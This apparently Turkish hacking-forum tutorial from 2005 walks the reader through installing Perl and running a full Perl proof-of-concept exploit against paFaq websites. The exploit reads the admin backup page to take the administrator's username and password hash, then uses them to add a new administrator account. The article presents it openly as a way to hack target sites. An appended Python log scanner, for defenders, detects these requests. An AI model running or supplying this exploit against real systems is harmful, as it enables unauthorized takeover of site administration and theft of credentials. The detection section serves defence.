  Author : Bilginx
  Date : 03.09.2005 05:04:30
 
# Pafaq Sql Injection
 


With the exploit we are going to use, you can hack all current versions of paFaq. With the exploit we can add an admin and, at the same time, obtain the existing admin's username and the MD5 hash of their password.


First we download Perl: http://www.dzsoft.com/download/dzperl56.exe

To activate Perl:

http://downloads.activestate.com/ActivePerl/Windows/5.6/ActivePerl-5.6.1.635-MSWin32-x86.zip

When installing Perl, we install it into the C:\perl directory.

We paste the exploit code I have written out below into Notepad, save it as pafaq.pl, and put it in the bin folder inside the Perl directory.

We click Run and type "cmd", then, to move to the root directory and into Perl's bin folder:

```
cd..
cd..
cd perl
cd bin
```

Then we type the command needed to run our exploit.

```
perl pafaq.pl http://www.hedefsite.com/pafaq/
```

After the exploit has run, an admin has been added to the target site with user: pafaq password: pafaq. All that remains is to go to the /admin/ directory and log in.


Exploit :

```perl
#!/usr/bin/perl -w
##########################################################################
# paFaq 1.0 Add Administrator PoC // By James // http://www.gulftech.org
##########################################################################

use LWP::UserAgent;

# Set up the LWP User Agent
$ua = new LWP::UserAgent;
$ua->agent("paFaq Hash Grabber v1.0");

if ( !$ARGV[0] ) { print "Usage : pafaq.pl http://path/to/pafaq"; exit; }

my $key_time = time();

my $dbm_path = $ARGV[0] . '/admin/backup.php';
my $add_user = 'pafaq'; # change this?
my $add_pass = 'pafaq'; # change this?
my $add_email = '[email protected]'; # change this? (address redacted in the source page)
my $add_path = $ARGV[0] . '/admin/index.php?area=users&act=doadd&name=' . $add_user .
    '&password=' . $add_pass . '&email=' . $add_email .
    '&notify=1&can_edit_settings=1&can_edit_admins=1&can_add_admins=1&can_del_admins=1&is_a_admin=1';

print "[*] Trying Host " . $ARGV[0] . "\n";

my $dbm = $ua->get($dbm_path);

if ( $dbm->content =~ /'([0-9]{1,8})',\s'(.*)',\s'([a-f0-9]{32})'/i)
{
        print "[+] User ID Is " . $1 . "\n";
        print "[+] User Name Is " . $2 . "\n";
        print "[+] User Password Is " . $3 . "\n";
        print "[*] Trying to add new user ...\n";

        my @cookie = ('Cookie' => 'pafaq_user=' . $2 . '; pafaq_pass=' . $3);
        my $add = $ua->get($add_path, @cookie);

        if ( $add->content =~ /has been created successfully/ )
        {
                print "[+] User $add_user Added Successfully!\n";
                print "[+] User Password Is $add_pass\n";
        }
        else
        {
                print "[!] Unable To Add User! Maybe the username is already taken? ...\n";
                print "[!] Shutting Down ...\n";
                exit;
        }
}
else
{
        print "[!] The Host Is Not Vulnerable ...\n";
        print "[!] Shutting Down ...\n";
        exit;
}
exit;
```


Regards, Bilginx.

For personal questions: [email protected]
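
For defenders, the requests made by the script above leave recognizable traces in web-server access logs: a fetch of /admin/backup.php, a GET to /admin/index.php carrying area=users&act=doadd, and the script's default User-Agent string. The log scanner below is an added example, not part of the original article or of the PoC; the log lines are constructed, and the 300-second correlation window and the severity labels are assumptions.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log format.
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<url>\S+) [^"]*" '
                  r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
POC_UA = "paFaq Hash Grabber"  # default User-Agent string set by the script on this page
WINDOW = 300                   # assumed correlation window, in seconds

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [03/Sep/2005:05:10:01 +0000] "GET /pafaq/admin/backup.php HTTP/1.1" 200 5120 "-" "paFaq Hash Grabber v1.0"',
    '203.0.113.7 - - [03/Sep/2005:05:10:02 +0000] "GET /pafaq/admin/index.php?area=users&act=doadd&name=x&is_a_admin=1 HTTP/1.1" 200 900 "-" "paFaq Hash Grabber v1.0"',
    '192.0.2.10 - - [03/Sep/2005:05:11:00 +0000] "GET /pafaq/index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [03/Sep/2005:05:12:00 +0000] "GET /pafaq/admin/backup.php HTTP/1.1" 403 210 "-" "Mozilla/5.0"',
]

def classify(url, ua):
    """Name the indicator a request matches, or return None."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    if parts.path.endswith("/admin/backup.php"):
        return "backup_fetch"          # database dump endpoint
    if (parts.path.endswith("/admin/index.php")
            and query.get("area") == ["users"] and query.get("act") == ["doadd"]):
        return "admin_add"             # account creation carried in a GET query string
    return "poc_user_agent" if POC_UA in ua else None

def scan(lines):
    """Return (severity, ip, indicator, url) findings, correlated per client IP."""
    findings, last_dump = [], {}       # last_dump: ip -> time of a successful backup.php fetch
    for line in lines:
        m = LINE.match(line)
        kind = classify(m["url"], m["ua"]) if m else None
        if kind is None:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        sev = "medium" if m["status"] == "200" else "low"
        if kind == "backup_fetch" and sev == "medium":
            last_dump[m["ip"]] = ts
        seen = last_dump.get(m["ip"])
        if kind == "admin_add" and seen and 0 <= (ts - seen).total_seconds() <= WINDOW:
            sev = "high"               # dump read, then an admin created, by the same client
        findings.append((sev, m["ip"], kind, m["url"]))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

Legitimate administrator activity can also match the `admin_add` and `backup_fetch` indicators, so the "high" correlation is the finding to triage first; the User-Agent check only catches an unmodified copy of the script.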

   
   
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©